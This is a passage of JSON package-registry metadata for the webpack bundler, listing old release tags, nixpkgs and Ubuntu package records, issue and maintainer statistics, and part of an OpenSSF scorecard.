kg:github/webpack/webpack@v1.0.0-rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"7044c7a0f88a3f8645541330a9f235f66526b6ad","kind":"commit","published_at":"2014-02-11T12:30:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc4","sha":"6b7c23fb3181fa118a69ba3e320eb9ff57f249a4","kind":"commit","published_at":"2014-02-11T11:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4/manifests"},{"name":"v1.0.0-rc3","sha":"60684612b21b2f9481073fade5dbf0b0743fe833","kind":"commit","published_at":"2014-02-05T11:37:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"81d90ac4b8860ebb9ab3e5485a804becbd18c1ca","kind":"commit","published_at":"2014-02-05T11:05:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2/manifests"},{"name":"v1.0.0-rc1","sha":"5965a3a96a711629bcde184162c0f25f51da80dc","kind":"commit","published_at":"2014-02-03T17:21:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1/manifests"},{"name":"v1.0.0-beta9","sha":"0752c3bfff32b0a5beca6b8da5f6bd7eb34abd0e","kind":"commit","published_at":"2014-01-31T13:09:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9/manifests"},{"name":"v1.0.0-beta8","sha":"e58f315f321e6535a9ff34a8b87f949919dace01","kind":"commit","published_at":"2014-01-24T12:33:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8/manifests"},{"name":"v1.0.0-beta7","sha":"8be2e5a14ac873b703119362b5c3447eb8e5f60e","kind":"commit","published_at":"2014-01-21T15:25:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7/manifests"},{"name":"v1.0.0-beta6","sha":"a9fc61ff1a22091135f183809fb537a1325e532b","kind":"commit","published_at":"2014-01-10T09:49:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6/manifests"},{"name":"v1.0.0-beta5","sha":"cf45c9cd1cce6e3136894ace4f9ae8618d1211a1","kind":"commit","published_at":"2014-01-08T18:23:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5/manifests"},{"name":"v1.0.0-beta4","sha":"df0f3687db404a87eab75af62504828ce13dd03d","kind":"commit","published_at":"2013-12-29T11:21:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4/manifests"},{"name":"v1.0.0-beta3","sha":"a4c58898ff5395124ac8e2cf79c25095fbe8a98e","kind":"commit","published_at":"2013-12-29T11:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3/manifests"},{"name":"v1.0.0-beta2","sha":"f30bcfbd5793f9282d7dedb0ea0a20674f763fed","kind":"commit","published_at":"2013-12-19T22:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2/manifests"}]},"repo_metadata_updated_at":"2026-08-23T22:03:38.519Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:nix/nodePackages_latest.webpack?channel=24.11\u0026repository_url=https://channels.nixos.org/nixos-24.11","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/nixpkgs/nodePackages_latest.webpack","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/nixpkgs/nodePackages_latest.webpack","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/nixpkgs/nodePackages_latest.webpack/dependencies","status":null,"funding_links":["https://opencollective.com/webpack"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T17:39:29.481Z","issues_count":10162,"pull_requests_count":9399,"avg_time_to_close_issue":10837189.563112684,"avg_time_to_close_pull_request":2756725.7170131044,"issues_closed_count":9895,"pull_requests_closed_count":8852,"pull_request_authors_count":1443,"issue_authors_count":6683,"avg_comments_per_issue":5.834776618775831,"avg_comments_per_pull_request":3.1609745717629534,"merged_pull_requests_count":5992,"bot_issues_count":8,"bot_pull_requests_count":2909,"past_year_issues_count":80,"past_year_pull_requests_count":908,"past_year_avg_time_to_close_issue":899649.5272727272,"past_year_avg_time_to_close_pull_request":370883.2323943662,"past_year_issues_closed_count":55,"past_year_pull_requests_closed_count":710,"past_year_pull_request_authors_count":80,"past_year_issue_authors_count":62,"past_year_avg_comments_per_issue":3.4125,"past_year_avg_comments_per_pull_request":4.709251101321586,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":138,"past_year_merged_pull_requests_count":559,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/issues","maintainers":[{"login":"sokra","count":1358,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sokra"},{"login":"alexander-akait","count":1057,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"vankop","count":196,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vankop"},{"login":"ooflorent","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ooflorent"},{"login":"TheLarkInn","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheLarkInn"},{"login":"hai-x","count":123,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":111,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"timse","count":100,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/timse"},{"login":"snitin315","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/snitin315"},{"login":"jhnns","count":78,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jhnns"},{"login":"xtuc","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xtuc"},{"login":"smelukov","count":52,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/smelukov"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"evenstensberg","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"chenxsan","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chenxsan"},{"login":"Legends","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Legends"},{"login":"Jessidhia","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Jessidhia"},{"login":"ScriptedAlchemy","count":31,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ScriptedAlchemy"},{"login":"avivkeller","count":30,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"jamesgeorge007","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jamesgeorge007"},{"login":"michael-ciniawsky","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/michael-ciniawsky"},{"login":"EugeneHlushko","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/EugeneHlushko"},{"login":"Connormiha","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Connormiha"},{"login":"hiroppy","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hiroppy"},{"login":"samccone","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/samccone"},{"login":"SpaceK33z","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/SpaceK33z"},{"login":"mc-zone","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mc-zone"},{"login":"sendilkumarn","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sendilkumarn"},{"login":"gajus","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gajus"},{"login":"byzyk","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/byzyk"},{"login":"ljqx","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljqx"},{"login":"gpoitch","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gpoitch"},{"login":"nveenjain","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nveenjain"},{"login":"kentcdodds","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kentcdodds"},{"login":"jbottigliero","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jbottigliero"},{"login":"JounQin","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/JounQin"},{"login":"edmorley","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edmorley"},{"login":"montogeek","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/montogeek"},{"login":"elliottsj","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/elliottsj"},{"login":"burhanuday","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/burhanuday"},{"login":"pierreneter","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pierreneter"},{"login":"Janpot","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Janpot"},{"login":"ovflowd","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"},{"login":"billyjanitsch","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/billyjanitsch"},{"login":"keblodev","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/keblodev"},{"login":"shama","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shama"},{"login":"anikethsaha","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anikethsaha"},{"login":"ljcrapo","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljcrapo"},{"login":"matheus1lva","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/matheus1lva"},{"login":"rishabh3112","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rishabh3112"},{"login":"joshwiens","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/joshwiens"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"reergymerej","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/reergymerej"},{"login":"jeremenichelli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jeremenichelli"},{"login":"aboktor","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aboktor"},{"login":"MrKou47","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/MrKou47"},{"login":"mikegreiling","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mikegreiling"},{"login":"eemeli","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/eemeli"},{"login":"mattlewis92","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mattlewis92"},{"login":"pranshuchittora","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pranshuchittora"},{"login":"3ru","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/3ru"},{"login":"ryanclark","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ryanclark"},{"login":"sapegin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sapegin"},{"login":"loveky","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/loveky"},{"login":"edocipriano","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edocipriano"},{"login":"PatrickJS","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/PatrickJS"},{"login":"jevancc","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jevancc"},{"login":"chrisdothtml","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chrisdothtml"},{"login":"anshumanv","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anshumanv"}],"active_maintainers":[{"login":"alexander-akait","count":416,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"hai-x","count":82,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":55,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"avivkeller","count":30,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"evenstensberg","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"ovflowd","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/packages/nodePackages_latest.webpack/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/packages/nodePackages_latest.webpack/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/packages/nodePackages_latest.webpack/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/packages/nodePackages_latest.webpack/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/packages/nodePackages_latest.webpack/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/packages/nodePackages_latest.webpack/codemeta","maintainers":[],"registry":{"name":"nixpkgs-24.11","url":"https://channels.nixos.org/nixos-24.11","ecosystem":"nixpkgs","default":false,"packages_count":121983,"maintainers_count":3777,"namespaces_count":0,"keywords_count":739,"github":"NixOS","metadata":{"funded_packages_count":3757},"icon_url":"https://github.com/NixOS.png","created_at":"2026-01-25T22:30:53.059Z","updated_at":"2026-09-02T05:05:10.221Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/namespaces"}},{"id":13559176,"name":"node-webpack","ecosystem":"ubuntu","description":null,"homepage":"https://github.com/webpack/webpack","licenses":"mit","normalized_licenses":[],"repository_url":"https://github.com/webpack/webpack","keywords_array":["universe/misc"],"namespace":"universe","versions_count":1,"first_release_published_at":"2026-02-11T04:56:26.039Z","latest_release_published_at":"2026-02-11T04:56:26.039Z","latest_release_number":"5.76.1+dfsg1+~cs17.16.16-1","last_synced_at":"2026-03-11T11:05:34.204Z","created_at":"2026-02-11T04:56:25.817Z","updated_at":"2026-08-22T21:31:24.064Z","registry_url":"https://launchpad.net/ubuntu/+source/node-webpack","install_command":"apt-get install node-webpack","documentation_url":null,"metadata":{"component":"universe","architecture":"all","priority":"optional","binary":"webpack","standards_version":"4.6.2","maintainer":"Debian Javascript Maintainers \u003cpkg-javascript-devel@lists.alioth.debian.org\u003e","build_depends":"debhelper-compat (= 13), dh-nodejs, dh-sequence-nodejs, jest (\u003e= 29) \u003c!nocheck\u003e, node-acorn (\u003e= 8.5.0+ds+~cs24.17.6~), node-babel7, node-browserslist \u003c!nocheck\u003e, node-chrome-trace-event \u003c!nocheck\u003e, node-colorette, node-commander, node-enhanced-resolve \u003c!nocheck\u003e, node-es-module-lexer, node-eslint-scope \u003c!nocheck\u003e, node-eslint-visitor-keys, node-esrecurse \u003c!nocheck\u003e, node-estraverse \u003c!nocheck\u003e, node-events \u003c!nocheck\u003e, node-findup-sync \u003c!nocheck\u003e, node-graceful-fs \u003c!nocheck\u003e, node-interpret (\u003e= 2.2~) \u003c!nocheck\u003e, node-json-parse-better-errors \u003c!nocheck\u003e, node-libs-browser \u003c!nocheck\u003e, node-loader-runner \u003c!nocheck\u003e, node-mime-types \u003c!nocheck\u003e, node-neo-async \u003c!nocheck\u003e, node-p-limit \u003c!nocheck\u003e, node-rechoir, node-resolve-cwd \u003c!nocheck\u003e, node-rollup-plugin-commonjs, node-rollup-plugin-json, node-rollup-plugin-node-resolve, node-rollup-plugin-terser, node-schema-utils \u003c!nocheck\u003e, node-supports-color \u003c!nocheck\u003e, node-tapable (\u003e= 2.0~), node-typescript, node-watchpack \u003c!nocheck\u003e, node-webassemblyjs (\u003e= 1.9.1+dfsg+~cs11.9.35~) \u003c!nocheck\u003e, node-webpack-merge (\u003e= 5.8.0~), node-webpack-sources (\u003e= 3.2.1~) \u003c!nocheck\u003e, node-yargs \u003c!nocheck\u003e, rollup, terser \u003c!nocheck\u003e","build_depends_indep":null,"build_depends_arch":null},"repo_metadata":{"id":2686067,"uuid":"3678731","full_name":"webpack/webpack","owner":"webpack","description":"A bundler for javascript and friends. Packs many modules into a few bundled assets. Code Splitting allows for loading parts of the application on demand. Through \"loaders\", modules can be CommonJs, AMD, ES6 modules, CSS, Images, JSON, Coffeescript, LESS, ... and your custom stuff.","archived":false,"fork":false,"pushed_at":"2026-08-22T00:09:57.000Z","size":95341,"stargazers_count":65973,"open_issues_count":138,"forks_count":9525,"subscribers_count":1466,"default_branch":"main","last_synced_at":"2026-08-22T13:33:37.681Z","etag":null,"topics":["amd","build-tool","commonjs","compiler","es2015","es6","esm","javascript","javascript-compiler","javascript-modules","loaders","module-bundler","plugins","web","web-performance","webpack"],"latest_commit_sha":null,"homepage":"https://webpack.js.org","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/webpack.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":"GOVERNANCE.md","roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":null,"dco":null,"cla":null,"disclosure":null},"funding":{"open_collective":"webpack"}},"created_at":"2012-03-10T10:08:14.000Z","updated_at":"2026-08-22T08:28:27.000Z","dependencies_parsed_at":"2026-08-08T12:34:57.314Z","dependency_job_id":null,"html_url":"https://github.com/webpack/webpack","commit_stats":{"total_commits":12493,"total_committers":934,"mean_commits":"13.375802997858672","dds":0.5586328343872569,"last_synced_commit":"89dfc9a5c575dc691e3ac6a965d39c854fca3986"},"previous_names":[],"tags_count":670,"template":false,"template_full_name":null,"purl":"pkg:github/webpack/webpack","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/sbom","scorecard":{"id":546233,"data":{"date":"2025-07-28","repo":{"name":"github.com/webpack/webpack","commit":"de79ee457eb921e6e1b186c90c65590789a013ca"},"scorecard":{"version":"v5.2.1-26-g4feedb85","commit":"4feedb857ab8d82158aa9774bf8054df41992180"},"score":6,"checks":[{"name":"Code-Review","score":5,"reason":"Found 12/24 approved changesets -- score normalized to 5","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#code-review"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#packaging"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 12 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:6","Info: topLevel 'contents' permission set to 'read': .github/workflows/examples.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:13","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#token-permissions"}},{"name":"Security-Policy","score":9,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Warn: One or no descriptive hints of disclosure, vulnerability, and/or timelines in security policy","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#cii-best-practices"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are 